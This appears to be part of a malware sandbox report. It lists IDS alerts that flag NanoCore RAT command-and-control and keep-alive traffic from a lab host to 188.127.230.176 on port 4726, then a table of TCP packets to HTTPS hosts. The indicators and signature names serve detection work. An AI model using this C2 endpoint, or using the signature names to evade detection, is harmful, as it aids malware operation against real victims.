192.168.11.20188.127.230.1764986247262816766 08/05/22-11:38:06.729941	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49862	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988547262816766 08/05/22-11:40:00.970573	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49885	4726	192.168.11.20	188.127.230.176
188.127.230.176192.168.11.204726498322810290 08/05/22-11:35:24.225691	TCP	2810290	ETPRO TROJAN NanoCore RAT Keepalive Response 1	4726	49832	188.127.230.176	192.168.11.20
192.168.11.20188.127.230.1764985247262816766 08/05/22-11:37:07.368175	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49852	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764987347262816718 08/05/22-11:39:13.855980	TCP	2816718	ETPRO TROJAN NanoCore RAT Keep-Alive Beacon	49873	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985147262025019 08/05/22-11:36:59.699324	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49851	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764983847262025019 08/05/22-11:35:47.449492	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49838	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984847262025019 08/05/22-11:36:42.032110	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49848	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984147262025019 08/05/22-11:36:05.289138	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49841	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986147262025019 08/05/22-11:37:52.997548	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49861	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764979447262816718 08/05/22-11:33:02.095717	TCP	2816718	ETPRO TROJAN NanoCore RAT Keep-Alive Beacon	49794	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764983147262025019 08/05/22-11:35:17.664167	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49831	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764987147262025019 08/05/22-11:38:57.638279	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49871	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764982847262025019 08/05/22-11:34:58.742582	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49828	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985847262025019 08/05/22-11:37:41.082895	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49858	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986847262025019 08/05/22-11:38:39.814344	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49868	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764979947262816766 08/05/22-11:33:09.270945	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49799	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764987247262816766 08/05/22-11:39:08.653978	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49872	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764981147262025019 08/05/22-11:33:46.481160	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49811	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764989147262025019 08/05/22-11:40:34.838222	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49891	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764980147262025019 08/05/22-11:33:14.652316	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49801	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988147262025019 08/05/22-11:39:41.582894	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49881	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988747262025019 08/05/22-11:40:11.197738	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49887	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764983247262025019 08/05/22-11:35:23.679240	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49832	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984247262025019 08/05/22-11:36:11.291801	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49842	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764982247262025019 08/05/22-11:34:30.638951	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49822	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764983547262816766 08/05/22-11:35:31.451561	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49835	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764981547262816766 08/05/22-11:34:08.501141	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49815	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764982547262816766 08/05/22-11:34:50.204627	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49825	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764987847262025019 08/05/22-11:39:23.730317	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49878	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988847262025019 08/05/22-11:40:17.090533	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49888	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764980547262816766 08/05/22-11:33:22.383668	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49805	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764981247262025019 08/05/22-11:33:52.852731	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49812	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988447262816766 08/05/22-11:39:55.080767	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49884	4726	192.168.11.20	188.127.230.176
188.127.230.176192.168.11.204726498262841753 08/05/22-11:34:54.542585	TCP	2841753	ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)	4726	49826	188.127.230.176	192.168.11.20
192.168.11.20188.127.230.1764985747262816766 08/05/22-11:37:36.861672	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49857	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984747262816766 08/05/22-11:36:37.812002	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49847	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764983747262816766 08/05/22-11:35:43.236046	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49837	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764980747262816766 08/05/22-11:33:29.009824	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49807	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764979447262025019 08/05/22-11:33:01.102124	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49794	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985647262816766 08/05/22-11:37:30.956682	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49856	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764987947262816766 08/05/22-11:39:31.508413	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49879	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986647262816766 08/05/22-11:38:24.570048	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49866	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986947262816766 08/05/22-11:38:47.423878	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49869	4726	192.168.11.20	188.127.230.176
188.127.230.176192.168.11.204726498922841753 08/05/22-11:40:40.909395	TCP	2841753	ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)	4726	49892	188.127.230.176	192.168.11.20
192.168.11.20188.127.230.1764984947262816766 08/05/22-11:36:49.653463	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49849	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988647262816766 08/05/22-11:40:06.907839	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49886	4726	192.168.11.20	188.127.230.176
188.127.230.176192.168.11.204726498552810290 08/05/22-11:37:23.933683	TCP	2810290	ETPRO TROJAN NanoCore RAT Keepalive Response 1	4726	49855	188.127.230.176	192.168.11.20
192.168.11.20188.127.230.1764983947262816766 08/05/22-11:35:55.157703	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49839	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984147262816718 08/05/22-11:36:06.412675	TCP	2816718	ETPRO TROJAN NanoCore RAT Keep-Alive Beacon	49841	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985247262816718 08/05/22-11:37:06.689723	TCP	2816718	ETPRO TROJAN NanoCore RAT Keep-Alive Beacon	49852	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986247262816718 08/05/22-11:38:06.064476	TCP	2816718	ETPRO TROJAN NanoCore RAT Keep-Alive Beacon	49862	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764981947262816766 08/05/22-11:34:20.560923	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49819	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764982947262816766 08/05/22-11:35:06.392387	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49829	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986747262816766 08/05/22-11:38:35.504977	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49867	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986847262816766 08/05/22-11:38:41.519368	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49868	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985847262816766 08/05/22-11:37:42.751072	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49858	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988747262816766 08/05/22-11:40:12.952395	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49887	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764980947262816766 08/05/22-11:33:42.225764	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49809	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984847262816766 08/05/22-11:36:43.701356	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49848	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764982347262025019 08/05/22-11:34:37.283841	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49823	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985647262025019 08/05/22-11:37:29.239382	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49856	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986647262025019 08/05/22-11:38:22.853369	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49866	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988047262816766 08/05/22-11:39:37.382125	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49880	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986947262025019 08/05/22-11:38:45.661129	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49869	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764987947262025019 08/05/22-11:39:29.799274	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49879	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764979447262816766 08/05/22-11:33:02.918743	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49794	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764987347262025019 08/05/22-11:39:12.794756	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49873	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764983647262025019 08/05/22-11:35:35.588696	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49836	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984047262025019 08/05/22-11:35:59.334024	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49840	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988347262025019 08/05/22-11:39:47.440909	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49883	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764981347262025019 08/05/22-11:33:59.524508	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49813	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988947262025019 08/05/22-11:40:22.999504	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49889	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985047262025019 08/05/22-11:36:53.797027	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49850	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764989047262816766 08/05/22-11:40:30.642557	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49890	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984647262025019 08/05/22-11:36:30.148934	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49846	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764983047262025019 08/05/22-11:35:11.757510	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49830	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986347262025019 08/05/22-11:38:10.930109	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49863	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764982047262025019 08/05/22-11:34:24.776943	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49820	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988647262025019 08/05/22-11:40:05.214833	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49886	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984347262025019 08/05/22-11:36:17.149109	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49843	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985347262025019 08/05/22-11:37:11.505020	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49853	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764981347262816766 08/05/22-11:34:01.956440	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49813	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764981547262816718 08/05/22-11:34:06.548888	TCP	2816718	ETPRO TROJAN NanoCore RAT Keep-Alive Beacon	49815	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984647262816766 08/05/22-11:36:31.923763	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49846	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988947262816766 08/05/22-11:40:24.715388	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49889	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764983647262816766 08/05/22-11:35:37.356616	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49836	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764982347262816766 08/05/22-11:34:38.400629	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49823	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764982647262816766 08/05/22-11:34:54.600340	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49826	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984347262816766 08/05/22-11:36:18.892748	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49843	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764981647262816766 08/05/22-11:34:14.548367	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49816	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764980947262025019 08/05/22-11:33:40.862326	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49809	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985347262816766 08/05/22-11:37:13.273172	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49853	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986047262025019 08/05/22-11:37:47.088928	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49860	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988347262816766 08/05/22-11:39:49.207551	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49883	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764982947262025019 08/05/22-11:35:04.653208	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49829	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764983947262025019 08/05/22-11:35:53.420369	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49839	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986347262816766 08/05/22-11:38:12.650833	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49863	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764981947262025019 08/05/22-11:34:18.846234	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49819	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764987047262025019 08/05/22-11:38:51.699622	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49870	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764987347262816766 08/05/22-11:39:14.558994	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49873	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984447262816766 08/05/22-11:36:24.908622	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49844	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985447262816766 08/05/22-11:37:19.142625	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49854	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988047262025019 08/05/22-11:39:35.649873	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49880	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984947262025019 08/05/22-11:36:47.934119	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49849	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764989047262025019 08/05/22-11:40:28.935779	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49890	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764983147262816766 08/05/22-11:35:19.422932	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49831	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764979947262025019 08/05/22-11:33:09.351214	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49799	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984147262816766 08/05/22-11:36:06.959521	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49841	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764987147262816766 08/05/22-11:38:59.359089	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49871	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764982447262816766 08/05/22-11:34:44.321230	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49824	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986147262816766 08/05/22-11:37:54.689740	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49861	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985147262816766 08/05/22-11:37:01.439088	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49851	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985247262025019 08/05/22-11:37:05.647447	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49852	4726	192.168.11.20	188.127.230.176
188.127.230.176192.168.11.204726498052810290 08/05/22-11:33:20.987562	TCP	2810290	ETPRO TROJAN NanoCore RAT Keepalive Response 1	4726	49805	188.127.230.176	192.168.11.20
192.168.11.20188.127.230.1764980747262025019 08/05/22-11:33:27.705061	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49807	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988547262025019 08/05/22-11:39:59.297023	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49885	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985747262025019 08/05/22-11:37:35.192270	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49857	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986247262025019 08/05/22-11:38:04.980731	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49862	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988747262816718 08/05/22-11:40:12.251822	TCP	2816718	ETPRO TROJAN NanoCore RAT Keep-Alive Beacon	49887	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764982447262025019 08/05/22-11:34:42.615251	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49824	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986747262025019 08/05/22-11:38:33.740764	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49867	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764987247262025019 08/05/22-11:39:08.530117	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49872	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988147262816766 08/05/22-11:39:43.302600	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49881	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764983747262025019 08/05/22-11:35:41.497992	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49837	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764989247262025019 08/05/22-11:40:40.860829	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49892	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984747262025019 08/05/22-11:36:36.081307	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49847	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764989147262816766 08/05/22-11:40:36.556679	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49891	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764981547262025019 08/05/22-11:34:06.249675	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49815	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764982547262025019 08/05/22-11:34:48.459435	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49825	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985447262025019 08/05/22-11:37:17.410149	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49854	4726	192.168.11.20	188.127.230.176
188.127.230.176192.168.11.204726498792810290 08/05/22-11:39:30.538129	TCP	2810290	ETPRO TROJAN NanoCore RAT Keepalive Response 1	4726	49879	188.127.230.176	192.168.11.20
192.168.11.20188.127.230.1764982047262816766 08/05/22-11:34:26.497193	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49820	4726	192.168.11.20	188.127.230.176
188.127.230.176192.168.11.204726498722841753 08/05/22-11:39:08.581261	TCP	2841753	ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)	4726	49872	188.127.230.176	192.168.11.20
192.168.11.20188.127.230.1764984447262025019 08/05/22-11:36:23.227143	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49844	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764980547262025019 08/05/22-11:33:20.270209	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49805	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764982947262816718 08/05/22-11:35:05.845352	TCP	2816718	ETPRO TROJAN NanoCore RAT Keep-Alive Beacon	49829	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764984047262816766 08/05/22-11:36:01.054518	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49840	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764983047262816766 08/05/22-11:35:13.486265	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49830	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764987047262816766 08/05/22-11:38:53.408201	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49870	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764982647262025019 08/05/22-11:34:54.491567	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49826	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986547262025019 08/05/22-11:38:16.903783	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49865	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764980147262816766 08/05/22-11:33:15.747004	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49801	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764981647262025019 08/05/22-11:34:12.838139	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49816	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764983547262025019 08/05/22-11:35:29.695360	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49835	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985547262025019 08/05/22-11:37:23.336134	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49855	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764981147262816766 08/05/22-11:33:48.376691	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49811	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764986047262816766 08/05/22-11:37:48.782972	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49860	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764985047262816766 08/05/22-11:36:55.558305	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49850	4726	192.168.11.20	188.127.230.176
192.168.11.20188.127.230.1764988447262025019 08/05/22-11:39:53.345440	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49884	4726	192.168.11.20	188.127.230.176

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 5, 2022 11:32:57.924397945 CEST	49791	443	192.168.11.20	142.250.179.174
Aug 5, 2022 11:32:57.924468994 CEST	443	49791	142.250.179.174	192.168.11.20
Aug 5, 2022 11:32:57.924690962 CEST	49791	443	192.168.11.20	142.250.179.174
Aug 5, 2022 11:32:57.947097063 CEST	49791	443	192.168.11.20	142.250.179.174
Aug 5, 2022 11:32:57.947154045 CEST	443	49791	142.250.179.174	192.168.11.20
Aug 5, 2022 11:32:58.010257959 CEST	443	49791	142.250.179.174	192.168.11.20
Aug 5, 2022 11:32:58.010422945 CEST	49791	443	192.168.11.20	142.250.179.174
Aug 5, 2022 11:32:58.010437012 CEST	49791	443	192.168.11.20	142.250.179.174
Aug 5, 2022 11:32:58.012332916 CEST	443	49791	142.250.179.174	192.168.11.20
Aug 5, 2022 11:32:58.012677908 CEST	49791	443	192.168.11.20	142.250.179.174
Aug 5, 2022 11:32:58.132087946 CEST	49791	443	192.168.11.20	142.250.179.174
Aug 5, 2022 11:32:58.132128000 CEST	443	49791	142.250.179.174	192.168.11.20
Aug 5, 2022 11:32:58.132890940 CEST	443	49791	142.250.179.174	192.168.11.20
Aug 5, 2022 11:32:58.133080006 CEST	49791	443	192.168.11.20	142.250.179.174
Aug 5, 2022 11:32:58.137028933 CEST	49791	443	192.168.11.20	142.250.179.174
Aug 5, 2022 11:32:58.178596973 CEST	443	49791	142.250.179.174	192.168.11.20
Aug 5, 2022 11:32:58.524626970 CEST	443	49791	142.250.179.174	192.168.11.20
Aug 5, 2022 11:32:58.524816990 CEST	443	49791	142.250.179.174	192.168.11.20
Aug 5, 2022 11:32:58.524889946 CEST	49791	443	192.168.11.20	142.250.179.174
Aug 5, 2022 11:32:58.524960995 CEST	49791	443	192.168.11.20	142.250.179.174
Aug 5, 2022 11:32:58.526408911 CEST	49791	443	192.168.11.20	142.250.179.174
Aug 5, 2022 11:32:58.526490927 CEST	443	49791	142.250.179.174	192.168.11.20
Aug 5, 2022 11:32:58.623028040 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.623101950 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.623380899 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.623682976 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.623735905 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.658561945 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.658699036 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.658746958 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.659235954 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.659442902 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.662952900 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.663081884 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.663316011 CEST	49792	443	192.168.11.20	142.250.181.225
